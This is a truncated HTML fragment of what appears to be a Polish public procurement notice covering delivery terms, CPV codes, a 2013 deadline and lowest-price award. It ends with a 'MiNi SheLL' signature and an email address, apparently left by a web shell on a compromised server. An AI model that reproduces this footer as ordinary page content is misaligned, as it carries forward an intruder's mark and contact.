5.	Wykonawca (Dostawca) zobowiąże się dostarczać każdorazowo przedmiot zamówienia na własny koszt w sposób zabezpieczający przed uszkodzeniem             w czasie transportu do bazy Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 34.92.84.60-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com